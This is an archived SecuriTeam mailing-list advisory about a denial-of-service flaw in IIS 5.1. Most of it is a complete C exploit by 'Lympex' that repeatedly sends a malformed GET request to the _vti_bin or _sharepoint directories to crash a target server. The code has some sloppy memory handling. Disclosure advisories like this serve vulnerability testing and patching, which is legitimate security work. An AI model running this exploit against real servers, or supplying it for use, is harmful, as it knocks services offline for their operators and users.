[EXPL] Microsoft IIS Malformed URI DoS (Exploit #2)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Microsoft IIS Malformed URI DoS (Exploit #2)
------------------------------------------------------------------------


SUMMARY

<http://www.microsoft.com/WindowsServer2003/iis/default.mspx> Microsoft
Internet Information Services (IIS) is "a set of Internet-based services
for servers using Microsoft Windows".

Microsoft's IIS 5.1, the version that comes with Windows XP, contains a
security vulnerability in its handing of incoming requests that allows
remote attackers to cause the service to crash by sending it a malformed
request. The following exploit code can be used to determine whether you
are vulnerable to the malformed URI request affecting the IIS or not.

DETAILS

Vulnerable Systems:
* Microsoft Internet Information Server version 5.1

Immune Systems:
* Microsoft Internet Information Server version 5.0
* Microsoft Internet Information Server version 6.0

Exploit:
/*
Name: Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint) Exploit
File: Microsoft.IIS.Malformed.URI.DoS.(_vti_bin,_sharepoint).cpp
Author: Lympex
Contact:
.- Mail: lympex[at]gmail[dot]com
.- Web: http://l-bytes.tk
Date: 20/12/2005
Info: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"libws2_32.a")

SOCKET Connect(char *Host, short Port)
{
/*make the socket*/
WSADATA wsaData;
SOCKET Winsock;
/*structs*/
struct sockaddr_in Winsock_In;
struct hostent *Ip;

/*init*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociate*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned
int)NULL,(unsigned int)NULL);

//check the socket
if(Winsock==INVALID_SOCKET)
{
/*exit*/
WSACleanup();
return 1;
}

/*complete the struct*/
Ip=gethostbyname(Host);
Winsock_In.sin_port=htons(Port);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr
*)Ip->h_addr)));

/*connection*/

if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
/*exit*/
WSACleanup();
return 1;
}

return Winsock;
}

/*****************/
/* MAIN FUNCTION */
/*****************/
int main(int argc, char *argv[])
{

printf("\n*******************************************************************");
printf("\n* Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint)
Exploit *");

printf("\n*-----------------------------------------------------------------*");
printf("\n* Coded by Lympex: lympex[at]gmail[dot]com &&
http://l-bytes.tk *");
printf("\n* Info:
http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html *");

printf("\n*******************************************************************\n");

if(argc!=6)
{
printf("\n[+] Usage: %s <server.com> <port> <directory>
<value> <interval(ms)>",argv[0]);
printf("\n[+] Directories: \x22_vti_bin\x22 /
\x22_sharepoint\x22");
printf("\n (Directory must be set to \x22Scripts &
Executables\x22");
printf("\n[+] Values: ~0, ~1, ~2, ~3, ~4, ~5, ~6, ~7, ~8,
~9\n");
return -1;
}

BOOL Done=FALSE;
unsigned int i;
SOCKET DoS;
char *Request;

printf("\n[+] Doing DoS Attack...");
Request=(char *)malloc((strlen("GET
/")+strlen(argv[3])+strlen(argv[4])+strlen("/.dll/*\\\n\n"))*sizeof(char));
memset(Request,0,sizeof(Request));
//copy the request
strcpy(Request,"GET
/");strcat(Request,argv[3]);strcat(Request,"/.dll/*\\");strcat(Request,argv[4]);strcat(Request,"\n\n");

//make a bucle to do the attack
for(i=0;i<5;i++)
{
DoS=Connect(argv[1],(short)atoi(argv[2]));
//check the socket
if(DoS==1)
{
Done=FALSE;
break;
}
send(DoS,Request,strlen(Request),0);
Sleep(100);
WSACleanup();
//check
if(i==4)
{
Done=TRUE;
}
Sleep((DWORD)atoi(argv[5]));
}

//check again
if(Done==TRUE)
{
printf("DONE");
}else{
printf("ERROR - Server down?");
}

LocalFree(Request);
return 0;
}

/* EoF */


ADDITIONAL INFORMATION

The information has been provided by <mailto:lympex@xxxxxxxxx> Lympex
L-Bytes.Net.
The advisory can be found at:
<http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html>
http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [EXPL] Imail Buffer Overflow Exploit (RCPT TO)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Imail Buffer Overflow Exploit ... send $socket, $request, 0; ...
    (Securiteam)
  • [EXPL] Mercury Mail IMAP Stack Buffer Overflow (LOGIN, Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... #A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard ... send $socket, $request, 0; ...
    (Securiteam)
  • [NT] Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet Information Services (IIS) is "a set of Internet-based services ... * Microsoft Internet Information Server version 5.1 ...
    (Securiteam)
  • [NT] IIS 5.1 Source Disclosure Under FAT/FAT32 Volumes Using WebDAV
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... It is possible to remotely view the source code of web script files though ... * Microsoft Internet Information Server version 5.1 ...
    (Securiteam)
  • [EXPL] Mercur Messaging 2005 IMAP Buffer Overflow (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... #A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard ... send $socket, $request, 0; ...
    (Securiteam)